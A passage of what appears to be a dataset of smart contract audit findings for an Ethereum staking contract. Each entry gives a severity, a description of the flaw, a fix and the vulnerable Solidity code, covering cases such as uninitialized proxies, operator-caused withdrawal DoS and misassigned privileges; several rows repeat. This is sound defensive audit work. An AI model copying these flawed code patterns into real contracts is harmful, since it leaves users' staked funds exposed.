StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n +Potentially Uninitialized Implementations,medium,"Most contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are initialized explicitly nor are they protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdesturcts. lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\n",Petrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.,,"```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n" +Operator May DoS the Withdrawal or Make It More Expensive,medium,"While collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. By doing this, it won't be receiving any rewards, but so the treasury and withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n","A possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.",,"```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n" +ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided Argument,low,"The version to auto-initialize is not hardcoded with the constructor. On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\n","Similar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.",,```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n +StakingContract - Misleading Comment,low,The comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n,Rectify the comment to accurately describe the intention of the method/modifier.,,```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n +Impractical Checks for Global/Operator Fees and the Commission Limits,low,"The contract initialization sets up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n","The fees should be checked with a more practical limit. For instance, checking against a min - max limit, like 20% - 40%.",,```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n +Contracts Should Inherit From Their Interfaces,low,"The following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\n",Inherit from interface.,,```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n +Misleading Error Statements,low,"The contracts define custom errors to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n","Use a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\n",,"```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n" +Incorrect Priviliges setOperatorAddresses Acknowledged,high,"The function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n","The modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.",,"```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n" +Unconstrained Snapshot While Setting Operator Limit,medium,"Function `setOperatorLimit` as the name says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n","If the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.",,```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n +Hardcoded Operator Limit Logic,medium,"The contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\n","A better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.",,"```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n" +StakingContract - PubKey Length Checks Not Always Enforced,medium,"`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.","Enforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)",,"```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n" +Unpredictable Behavior Due to Admin Front Running or General Bad Timing,medium,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.",,```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n +Potentially Uninitialized Implementations,medium,"Most contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are initialized explicitly nor are they protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdesturcts. lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\n",Petrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.,,"```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n" +Operator May DoS the Withdrawal or Make It More Expensive,medium,"While collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. By doing this, it won't be receiving any rewards, but so the treasury and withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n","A possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.",,"```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}("""");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n" +ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided Argument,low,"The version to auto-initialize is not hardcoded with the constructor. On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\n","Similar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.",,```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n +StakingContract - Misleading Comment,low,The comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n,Rectify the comment to accurately describe the intention of the method/modifier.,,```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n +Impractical Checks for Global/Operator Fees and the Commission Limits,low,"The contract initialization sets up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n","The fees should be checked with a more practical limit. For instance, checking against a min - max limit, like 20% - 40%.",,```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n +Contracts Should Inherit From Their Interfaces,low,"The following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\n",Inherit from interface.,,```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n +Misleading Error Statements,low,"The contracts define custom errors to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror 